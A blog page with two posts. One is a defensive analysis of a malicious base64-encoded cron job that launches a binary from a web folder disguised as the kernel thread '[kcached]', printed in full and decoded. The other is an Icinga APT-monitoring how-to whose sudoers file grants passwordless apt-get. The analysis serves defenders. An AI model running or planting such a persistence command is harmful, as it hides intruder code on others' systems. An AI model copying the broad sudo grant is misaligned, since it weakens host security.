{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64. A very common method to - sort of - hide malicious contents
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge as the |base64 -d|bash; part clearly states that the base64-string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

What these commands do is easily explained. pkill checks (the -0 parameter sends signal 0, which only tests for existence) whether a process named gs-dbus is already running under the user ID 1004. If such a process is found, pkill exits with 0 and everything after the || (logical OR) is not executed.

The right-hand side of the OR is only executed when pkill exits with 1 because no process named gs-dbus was found. There, a few environment variables and parameters are set, the /home/admin/www/gs-dbus binary is started, and exec -a makes the process show up under the name [kcached].
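The renaming trick can be tried out harmlessly. The following is a minimal sketch, assuming bash, the procps version of ps and a standalone sleep binary (as on Debian); sleep is only a stand-in for the suspicious binary. It shows that exec -a merely replaces argv[0]: the args column of ps displays the forged name, while the comm column still shows the name of the executable that is really running.

```shell
#!/usr/bin/env bash
# Start a harmless sleep whose argv[0] is replaced by '[kcached]'
bash -c "exec -a '[kcached]' sleep 60" &
pid=$!
sleep 1   # give the child a moment to exec

# comm comes from the executable, args from the (forged) argv
shown_comm=$(ps -o comm= -p "$pid")
shown_args=$(ps -o args= -p "$pid")
echo "comm: $shown_comm"
echo "args: $shown_args"

# Clean up the demo process
kill "$pid"
wait "$pid" 2>/dev/null || true
```

So comparing both columns is a cheap first hint that a process name has been tampered with.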

And while this explains what is logically happening, it still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started if it isn't already running, and claimed it was probably safe. Why this person came to this conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again, this person overlooked some critical pieces of information.

And this made me take the time to write this little blogpost about how to approach such situations.

There are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software:

  1. Base64-encoded strings which get executed via bash are almost never doing anything good
  2. If that software really belonged to Gnome, you would have Systemd unit files or timers. Or, if that is a system without Systemd, you would have good old init. But even then there would, most likely, be some kind of sub-process started by Gnome itself and not some obfuscated CronJob
  3. Renaming the process to [kcached] makes it look like a kernel level thread. If there is an equivalent to the "world's biggest warning sign", this is it.
  4. The binary being started is /home/admin/www/gs-dbus. You notice www as being the folder where the binary is stored? Yeah, this is always an indicator that files in that folder are reachable via a Webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application and this was the entry point for the malicious software & CronJob.

What the person missed is this: processes in square brackets are always kernel level threads, run as root and have a Parent Process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to look like a kernel level thread. Obviously to deceive the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further or even kill that process when some scanning software reports a kernel level thread? Well, the obvious answer is: Of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Let's take a look at the following ps output from one of my Debian systems. I'll make it quick & dirty and simply grep for all processes with a [ in them.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes that don't have a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd], which actually owns PID 2 and was started by PPID 0. The second is my grep command, and the two others belong to sshd. But only [kthreadd] is actually enclosed in square brackets, as it doesn't have a command line.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452 and running under the username admin. Nothing that matches the behaviour of a kernel level thread. And this should raise all red flags your mind possesses.
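This comparison can be automated. The following is a minimal sketch, not a complete detection tool: the function name find_fake_kthreads is made up for this example, and it expects lines in the format pid, ppid, user, args on standard input. It prints every process whose command line starts with a square bracket but which is neither PID 2 itself nor a child of PID 2 running as root.

```shell
#!/usr/bin/env bash
# Hypothetical helper: list bracketed processes that do not behave
# like kernel level threads.
# Usage: ps -eo pid=,ppid=,user=,args= | find_fake_kthreads
find_fake_kthreads() {
    awk '
    # $1 = PID, $2 = PPID, $3 = user, $4 = first word of the command line
    $4 ~ /^\[/ && $1 != 2 && ($2 != 2 || $3 != "root") { print }
    '
}
```

Treat every hit as a lead, not as proof: ps also puts zombie processes in square brackets (followed by <defunct>), so those will show up here too.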

And this is why basics are so important. Do not just assume a piece of software is harmless because "there is some piece of legitimate software out there on the Internet sharing the same name". Anyone can lie. And the bad people most likely are.


How to monitor your APT-repositories with Icinga

Photo by Pixabay: https://www.pexels.com/photo/software-engineers-working-on-computers-256219/

During my series about unattended-upgrades (Part 1, Part 2) I noticed that a Debian mirror I use had been unresponsive for 22 days, but I had nothing to notify me of this. As this also meant that unattended-upgrades didn't apply any patches, I wanted a check for this, which in turn triggers unattended-upgrades when there are outstanding updates.

The problem

The monitoring-plugins provide the check_apt plugin. This is normally used to check for available package updates. However, in the default configuration it doesn't execute an apt-get update, as this requires root privileges. Personally I think the risk is worth the gain, as adding the -u parameter will execute an apt-get update, and check_apt will therefore notify you when apt-get update finishes with a non-zero exit-code.

Take the following problem:

root@host:~# apt-get update
Hit:1 http://security.debian.org/debian-security bookworm-security InRelease
Hit:2 http://debian.tu-bs.de/debian bookworm InRelease
Get:3 http://debian.tu-bs.de/debian bookworm-updates InRelease [55.4 kB]
Reading package lists... Done
E: Release file for http://debian.tu-bs.de/debian/dists/bookworm-updates/InRelease is expired (invalid since 16d 0h 59min 33s). Updates for this repository will not be applied.

A mere check_apt won't notify you of any problems:

root@host:~# /usr/lib/nagios/plugins/check_apt
APT CRITICAL: 12 packages available for upgrade (12 critical updates). |available_upgrades=12;;;0 critical_updates=12;;;0

So the expired repository goes undetected.

Executed with the -u parameter however, we are notified of the problem:

root@host:~# /usr/lib/nagios/plugins/check_apt -u
'/usr/bin/apt-get -q update' exited with non-zero status.
APT CRITICAL: 12 packages available for upgrade (12 critical updates).  warnings detected, errors detected.|available_upgrades=12;;;0 critical_updates=12;;;0

The solution

Fixing this via Icinga is, however, a bit more complicated, as the standard apt CheckCommand from the Icinga Template Library (ITL) doesn't include the -u option and isn't prefixed with sudo, despite root privileges being needed. This can be checked here: https://github.com/Icinga/icinga2/blob/master/itl/command-plugins.conf#L2155 or in your local /usr/share/icinga2/include/command-plugins.conf if you happen to use Icinga.

The root cause is also the main problem I have with the check_apt CheckPlugin. check_apt is designed to actually install package updates itself when it reports outstanding updates. This, however, breaks the number one paradigm I have regarding monitoring systems: they should not modify the system on their own. And when they do, they should do it in the same way as it is normally done. check_apt breaks this.

Maybe that person should have read a blog article about unattended-upgrades prior to writing that plugin? 😜

Normally you utilize Event Commands for that type of scenario: "If service X is in state Y execute event command Z."

The CheckCommand check_apt_update

Therefore I recommend creating your own check_apt_update CheckCommand and using that.

object CheckCommand "check_apt_update" {
        command = [ "/usr/bin/sudo", PluginDir + "/check_apt" ]

        arguments = {
                "-u" = {
                        description = "Perform an apt-get update"
                }
        }
}

Defining the service and configuring the EventCommand

Then in your service definition add a suitable event_command:

apply Service "apt repositories" to Host {
  import "hourly-service"

  check_command = "check_apt_update"

  enable_event_handler = true
  // Execute unattended-upgrades automatically if service goes critical
  event_command = "execute_unattended_upgrades"
  // For services which should be executed ON the host itself
  command_endpoint = host.vars.agent_endpoint

  assign where host.vars.distribution == "Debian"

}

Creating the EventCommand

And create the EventCommand like this:

object EventCommand "execute_unattended_upgrades" {
  command = "sudo /usr/bin/unattended-upgrades"
}

Necessary sudo rights

This requires a sudo config file for the icinga user executing that command. And the commands must be executable without the need for a TTY, hence we end up with the following:

root@host:~# cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

Conclusion

This is now sufficient as I'm notified when something prevents APT from properly updating the package lists. APT itself takes care to validate the various entries inside the Release file and exits with a non-zero exit-code, so there is no need to put that logic inside of check_apt.

Setting up similar checks for other monitoring systems is of course also possible. In general, raising an alarm when apt-get update exits with a non-zero exit-code is a somewhat foolproof method.
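For a monitoring system without a ready-made plugin, the idea boils down to very little shell. The following is a minimal sketch under stated assumptions: the function name check_repo_update is made up, the exit codes follow the usual Nagios plugin convention (0 = OK, 2 = CRITICAL), and the default command apt-get -q update needs root privileges. A different update command can be passed as arguments.

```shell
#!/usr/bin/env bash
# Hypothetical check: OK (0) if the update command succeeds,
# CRITICAL (2) otherwise.
check_repo_update() {
    local -a cmd=("$@")
    # Assumed default: refresh the APT package lists (needs root)
    if [ "${#cmd[@]}" -eq 0 ]; then
        cmd=(apt-get -q update)
    fi

    local output
    if output=$("${cmd[@]}" 2>&1); then
        echo "APT OK: '${cmd[*]}' succeeded"
        return 0
    fi

    echo "APT CRITICAL: '${cmd[*]}' exited with non-zero status"
    # Show the error lines from apt, if there are any
    printf '%s\n' "$output" | grep '^E:' || true
    return 2
}
```

Passing the command as arguments is purely a design choice for this sketch: it allows trying the function out with true or false without touching the real package lists.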
